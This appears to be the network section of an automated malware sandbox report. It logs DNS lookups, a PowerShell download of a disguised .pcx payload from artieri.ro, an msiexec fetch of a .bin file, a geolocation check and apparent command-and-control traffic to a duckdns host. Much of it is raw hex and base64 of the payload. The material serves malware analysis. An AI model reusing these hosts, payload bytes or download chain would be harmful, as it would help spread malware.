                                                                                                                                                    Oct 17, 2024 14:19:15.070905924 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:15.070918083 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:15.071347952 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:15.076626062 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:15.076637983 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:15.076648951 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:15.078843117 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:15.083652973 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:15.088969946 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:15.089062929 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:40.771397114 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:40.772664070 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:40.777645111 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:20:10.785355091 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:20:10.796118975 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:20:10.801244974 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Oct 17, 2024 14:18:15.939709902 CEST5683053192.168.2.41.1.1.1
                                                                                                                                                    Oct 17, 2024 14:18:15.961575985 CEST53568301.1.1.1192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:55.659715891 CEST5354594162.159.36.2192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:56.425652981 CEST53496681.1.1.1192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:04.860151052 CEST5968753192.168.2.41.1.1.1
                                                                                                                                                    Oct 17, 2024 14:19:05.477869034 CEST53596871.1.1.1192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.718386889 CEST5348553192.168.2.41.1.1.1
                                                                                                                                                    Oct 17, 2024 14:19:07.726483107 CEST53534851.1.1.1192.168.2.4
                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Oct 17, 2024 14:18:15.939709902 CEST192.168.2.41.1.1.10x5011Standard query (0)artieri.roA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 17, 2024 14:19:04.860151052 CEST192.168.2.41.1.1.10x4768Standard query (0)renajazinw.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Oct 17, 2024 14:19:07.718386889 CEST192.168.2.41.1.1.10xdf47Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Oct 17, 2024 14:18:15.961575985 CEST1.1.1.1192.168.2.40x5011No error (0)artieri.ro89.44.138.129A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 17, 2024 14:19:05.477869034 CEST1.1.1.1192.168.2.40x4768No error (0)renajazinw.duckdns.org193.187.91.216A (IP address)IN (0x0001)false
                                                                                                                                                    Oct 17, 2024 14:19:07.726483107 CEST1.1.1.1192.168.2.40xdf47No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                    • artieri.ro
                                                                                                                                                    • geoplugin.net
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.44973089.44.138.129806112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 17, 2024 14:18:15.979938984 CEST173OUTGET /g/Skifferdkkers.pcx HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                    Host: artieri.ro
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Oct 17, 2024 14:18:16.873316050 CEST949INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    content-type: text/html
                                                                                                                                                    content-length: 707
                                                                                                                                                    date: Thu, 17 Oct 2024 12:18:16 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    location: https://artieri.ro/g/Skifferdkkers.pcx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.44973889.44.138.129805172C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 17, 2024 14:18:54.465550900 CEST175OUTGET /g/MihrGCaVzvslPdUujzk140.bin HTTP/1.1
                                                                                                                                                    User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                    Host: artieri.ro
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 17, 2024 14:18:55.355421066 CEST958INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    content-type: text/html
                                                                                                                                                    content-length: 707
                                                                                                                                                    date: Thu, 17 Oct 2024 12:18:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    location: https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.462818178.237.33.50805172C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 17, 2024 14:19:07.732419014 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 17, 2024 14:19:08.587924004 CEST1165INHTTP/1.1 200 OK
                                                                                                                                                    date: Thu, 17 Oct 2024 12:19:08 GMT
                                                                                                                                                    server: Apache
                                                                                                                                                    content-length: 957
                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                                                                                    Data Ascii: { "geoplugin_request":"173.254.250.82", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.44973189.44.138.1294436112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-17 12:18:17 UTC173OUTGET /g/Skifferdkkers.pcx HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                    Host: artieri.ro
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2024-10-17 12:18:18 UTC391INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    content-type: image/x-pcx
                                                                                                                                                    last-modified: Thu, 17 Oct 2024 08:49:57 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 459916
                                                                                                                                                    date: Thu, 17 Oct 2024 12:18:17 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                    2024-10-17 12:18:18 UTC16384INData Raw: 63 51 47 62 36 77 49 6b 44 72 74 30 31 52 51 41 36 77 4a 52 4e 58 45 42 6d 77 4e 63 4a 41 54 72 41 72 77 69 63 51 47 62 75 51 79 78 43 55 2f 72 41 76 41 4b 63 51 47 62 67 66 46 54 61 51 44 73 63 51 47 62 36 77 4a 73 6c 6f 48 70 58 39 67 4a 6f 2b 73 43 35 55 35 78 41 5a 76 72 41 76 65 51 36 77 49 41 6f 37 70 41 57 45 4c 6f 63 51 47 62 63 51 47 62 36 77 4b 44 61 2b 73 43 4b 36 59 78 79 75 73 43 56 4d 31 78 41 5a 75 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 66 62 71 44 77 51 52 78 41 5a 74 78 41 5a 75 42 2b 55 79 64 63 77 4a 38 7a 4f 73 43 6d 6f 68 78 41 5a 75 4c 52 43 51 45 36 77 4c 4b 47 75 73 43 4d 4a 4b 4a 77 2b 73 43 6f 33 5a 78 41 5a 75 42 77 39 45 38 56 77 42 78 41 5a 76 72 41 6a 34 53 75 68 35 75 5a 7a 39 78 41 5a 74 78 41 5a 75
                                                                                                                                                    Data Ascii: cQGb6wIkDrt01RQA6wJRNXEBmwNcJATrArwicQGbuQyxCU/rAvAKcQGbgfFTaQDscQGb6wJsloHpX9gJo+sC5U5xAZvrAveQ6wIAo7pAWELocQGbcQGb6wKDa+sCK6YxyusCVM1xAZuJFAtxAZtxAZvR4nEBm+sCfbqDwQRxAZtxAZuB+UydcwJ8zOsCmohxAZuLRCQE6wLKGusCMJKJw+sCo3ZxAZuBw9E8VwBxAZvrAj4Suh5uZz9xAZtxAZu
                                                                                                                                                    2024-10-17 12:18:18 UTC16384INData Raw: 4b 70 71 69 79 79 71 61 6f 73 74 33 30 4b 37 73 51 56 31 35 65 77 45 59 4a 62 33 79 6d 30 6d 71 31 78 4d 76 72 69 69 61 6f 6b 4c 37 79 79 6c 47 54 35 69 69 79 30 79 56 5a 66 73 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4c 4c 4b 70 72 70 71 4e 42 6a 34 64 71 76 65 61 37 53 5a 6e 6b 63 41 56 68 75 39 6f 73 73 57 4e 36 5a 34 51 6f 45 55 57 42 57 6a 2f 33 54 67 6d 76 78 2b 54 63 6b 4f 53 37 61 7a 58 55 54 6e 4b 35 57 4e 65 44 70 67 56 54 42 34 6c 6c 7a 61 76 54 50 54 39 59 32 45 32 63 71 2b 62 73 38 65 6a 37 55 49 7a 6a 2b 59 69 38 54 46 38 4d 6f 6d 71 4a 43 7a 4d 77 63 4d 61 4e 6e 77 6b 72 63 49 66 2b 4e 56 78 74 55 75 31 64 2f 5a 30 72 73 56 66 56 71 44 63 73 2b 51 73 75 62 6b 31 61 75 55 64 6a 4f 77 7a 6a 72 37 39 77 67 39 47 7a 69 54 56 74
                                                                                                                                                    Data Ascii: Kpqiyyqaost30K7sQV15ewEYJb3ym0mq1xMvriiaokL7yylGT5iiy0yVZfsqmqLLKpqiyyqaossqmqLLKprpqNBj4dqvea7SZnkcAVhu9ossWN6Z4QoEUWBWj/3Tgmvx+TckOS7azXUTnK5WNeDpgVTB4llzavTPT9Y2E2cq+bs8ej7UIzj+Yi8TF8MomqJCzMwcMaNnwkrcIf+NVxtUu1d/Z0rsVfVqDcs+Qsubk1auUdjOwzjr79wg9GziTVt
                                                                                                                                                    2024-10-17 12:18:18 UTC16384INData Raw: 35 64 4b 34 4e 4a 32 36 77 37 56 50 43 77 76 61 78 68 56 57 30 68 66 39 53 73 77 76 7a 36 52 49 66 72 66 77 51 4c 2f 70 6f 4d 73 71 56 6d 46 71 53 46 54 6e 72 2f 4b 58 63 6c 6e 44 7a 70 6d 44 4a 59 6f 6e 6b 45 5a 46 48 61 75 74 69 6d 59 30 6e 77 61 69 79 79 6f 62 54 54 51 71 6d 71 4b 63 31 51 2b 6d 79 69 71 61 4b 31 34 63 6d 4b 4c 4c 6f 32 6a 77 51 4c 2b 73 6f 4d 73 71 47 32 55 30 4b 70 71 69 51 72 39 31 6f 38 73 71 79 68 72 45 65 50 61 76 2f 72 6a 37 50 4a 67 66 66 6c 6d 62 70 72 66 62 44 49 68 49 39 46 65 6a 66 4b 50 4e 74 78 35 34 75 43 35 74 30 31 6c 39 63 5a 4e 55 5a 68 41 66 46 68 51 34 64 6d 76 4b 56 6c 64 47 54 2f 72 67 31 6c 51 66 61 4a 58 53 77 69 73 78 65 42 45 33 4a 43 75 61 6f 71 30 6c 58 5a 54 4c 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4c
                                                                                                                                                    Data Ascii: 5dK4NJ26w7VPCwvaxhVW0hf9Sswvz6RIfrfwQL/poMsqVmFqSFTnr/KXclnDzpmDJYonkEZFHautimY0nwaiyyobTTQqmqKc1Q+myiqaK14cmKLLo2jwQL+soMsqG2U0KpqiQr91o8sqyhrEePav/rj7PJgfflmbprfbDIhI9FejfKPNtx54uC5t01l9cZNUZhAfFhQ4dmvKVldGT/rg1lQfaJXSwisxeBE3JCuaoq0lXZTLKpqiyyqaossqmqL
                                                                                                                                                    2024-10-17 12:18:18 UTC16384INData Raw: 4b 70 71 74 44 42 70 4c 6f 73 73 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4c 4c 54 74 4e 38 73 6f 79 62 4d 51 71 6a 44 34 54 4a 4b 70 6f 72 45 58 67 52 4e 2b 30 6f 6d 71 4b 64 6c 4f 4f 53 73 71 45 62 56 45 75 49 31 6d 42 4b 37 4f 2b 64 41 4a 77 54 6c 45 46 64 44 4b 37 55 6a 50 48 6a 38 59 51 49 43 4b 6c 53 68 6a 74 74 48 41 7a 4d 71 35 65 75 4c 70 55 6c 6d 72 47 55 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 39 67 66 38 49 70 43 35 59 77 48 71 35 72 72 76 41 41 65 4e 31 39 4b 38 31 61 36 77 59 42 5a 4a 4b 59 34 4b 45 78 39 4b 4b 35 71 69 64 4c 73 6a 59 33 75 72 64 57 78 50 5a 7a 59 6a 44 43 58 61 6a 51 7a 6d 36 73 67 56 46 59 51 36 46 74 67 4c 67 55 6e 2f 37 7a 62 48 31 35 59 52 54 78 4d 71 78 56 59 75 68 34 52
                                                                                                                                                    Data Ascii: KpqtDBpLossqmqLLKpqiyyqaossqmqLLTtN8soybMQqjD4TJKporEXgRN+0omqKdlOOSsqEbVEuI1mBK7O+dAJwTlEFdDK7UjPHj8YQICKlShjttHAzMq5euLpUlmrGUKpqiyyqaossqmqLLKpqiyyqa9gf8IpC5YwHq5rrvAAeN19K81a6wYBZJKY4KEx9KK5qidLsjY3urdWxPZzYjDCXajQzm6sgVFYQ6FtgLgUn/7zbH15YRTxMqxVYuh4R
                                                                                                                                                    2024-10-17 12:18:18 UTC16384INData Raw: 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 37 33 75 35 7a 50 63 7a 68 65 67 30 47 44 36 4e 48 75 2f 7a 67 79 41 7a 69 53 4f 45 30 33 73 38 6a 4d 62 4f 63 54 63 66 79 70 6a 31 51 72 63 46 6f 38 73 71 49 63 47 59 4b 65 6b 6a 49 44 35 50 64 61 71 72 63 58 57 56 30 35 63 6a 49 46 4a 56 6b 38 6a 6d 64 6e 6d 5a 6e 7a 48 6a 35 2b 35 43 6d 47 67 63 49 4e 48 4c 36 73 4c 53 4e 34 6b 7a 2b 49 61 48 71 34 55 70 42 6e 39 51 54 79 57 62 73 4e 4d 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4c 4c 4b 70 72 38 41 43 69 47 48 4f 7a 6e 4c 38 48 78 78 43 61 77 2b 48 6b 52 50 31 51 72 6d 71 49 6a 2b 55 53 68 79 36 4d 50 4e 63 6f 71 6d 69 73 4a 65 4a 57 6a 43 54 65 61 6f 73 73 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4b
                                                                                                                                                    Data Ascii: KpqiyyqaossqmqLLKpqiyyqa73u5zPczheg0GD6NHu/zgyAziSOE03s8jMbOcTcfypj1QrcFo8sqIcGYKekjID5PdaqrcXWV05cjIFJVk8jmdnmZnzHj5+5CmGgcINHL6sLSN4kz+IaHq4UpBn9QTyWbsNMqmqLLKpqiyyqaossqmqLLKpr8ACiGHOznL8HxxCaw+HkRP1QrmqIj+UShy6MPNcoqmisJeJWjCTeaossqmqLLKpqiyyqaossqmqK
                                                                                                                                                    2024-10-17 12:18:18 UTC16384INData Raw: 2f 4b 59 6a 2b 62 53 74 6e 32 71 72 73 4a 30 31 68 30 6f 72 54 6c 53 62 6f 73 75 53 37 65 58 6a 55 42 35 48 54 39 65 76 53 68 75 79 32 6f 2b 5a 46 63 2f 6b 2f 6d 50 43 2b 54 38 53 5a 79 63 5a 4b 31 67 70 54 6c 53 62 6f 73 74 4d 62 57 56 73 38 68 35 79 38 38 5a 64 6f 50 6d 61 49 58 52 4b 41 44 67 75 72 6a 30 62 6b 4a 42 36 67 43 37 79 2b 68 76 66 74 38 53 43 6f 73 73 6c 48 6e 38 5a 31 57 55 6a 79 58 4f 68 70 41 2b 6a 4a 7a 76 4b 4b 70 6f 64 47 2b 64 6b 6d 45 72 64 45 76 61 68 72 78 74 56 45 68 78 6e 56 55 2f 67 47 30 32 32 68 66 50 71 79 74 41 52 48 31 49 72 6d 71 4a 4b 56 2b 34 54 6f 53 71 61 72 55 5a 79 66 46 30 30 37 5a 67 61 2f 38 48 73 49 2f 6b 65 74 72 77 32 54 42 39 34 38 2f 6b 62 69 48 79 54 70 44 39 6a 38 42 75 49 61 50 52 59 67 55 4b 6e 67 36 44
                                                                                                                                                    Data Ascii: /KYj+bStn2qrsJ01h0orTlSbosuS7eXjUB5HT9evShuy2o+ZFc/k/mPC+T8SZycZK1gpTlSbostMbWVs8h5y88ZdoPmaIXRKADgurj0bkJB6gC7y+hvft8SCosslHn8Z1WUjyXOhpA+jJzvKKpodG+dkmErdEvahrxtVEhxnVU/gG022hfPqytARH1IrmqJKV+4ToSqarUZyfF007Zga/8HsI/ketrw2TB948/kbiHyTpD9j8BuIaPRYgUKng6D
                                                                                                                                                    2024-10-17 12:18:18 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    2024-10-17 12:18:19 UTC16384INData Raw: 73 58 46 54 30 55 61 76 6d 4e 6f 53 48 32 75 51 72 6d 58 36 51 76 72 4b 4b 55 36 76 6d 36 4c 4c 4a 56 32 51 69 79 71 61 6f 73 73 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 73 56 6e 69 65 50 70 30 39 67 54 46 39 41 6f 6d 71 4a 43 39 4d 79 74 79 6a 55 71 6f 73 73 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4c 4c 53 30 49 45 4e 48 41 52 46 39 41 6f 6d 71 4b 6a 7a 4e 39 73 35 71 75 32 68 6e 77 50 61 72 45 48 42 33 32 78 58 78 6c 56 74 42 30 52 31 79 5a 69 38 4f 6b 77 73 72 67 6d 37 61 39 4c 7a 4c 69 4e 48 64 69 54 31 57 57 35 4f 61 41 72 57 34 55 64 33 43 6f 61 4a 4a 42 4c 6f 6b 6f 65 76 76 34 48 58 34 36 74 79 7a 69 2b 6f 73 73 71 6d 71 4c 4c 4b 70 71 69 79 79 71 61 6f 73 73 71 6d 71 4c 4c 63 47 6d 4d 75 53 4a 6b 64 49 2f 57 44 47 36
                                                                                                                                                    Data Ascii: sXFT0UavmNoSH2uQrmX6QvrKKU6vm6LLJV2QiyqaossqmqLLKpqiyyqaossqmsVniePp09gTF9AomqJC9MytyjUqossqmqLLKpqiyyqaossqmqLLS0IENHARF9AomqKjzN9s5qu2hnwParEHB32xXxlVtB0R1yZi8Okwsrgm7a9LzLiNHdiT1WW5OaArW4Ud3CoaJJBLokoevv4HX46tyzi+ossqmqLLKpqiyyqaossqmqLLcGmMuSJkdI/WDG6
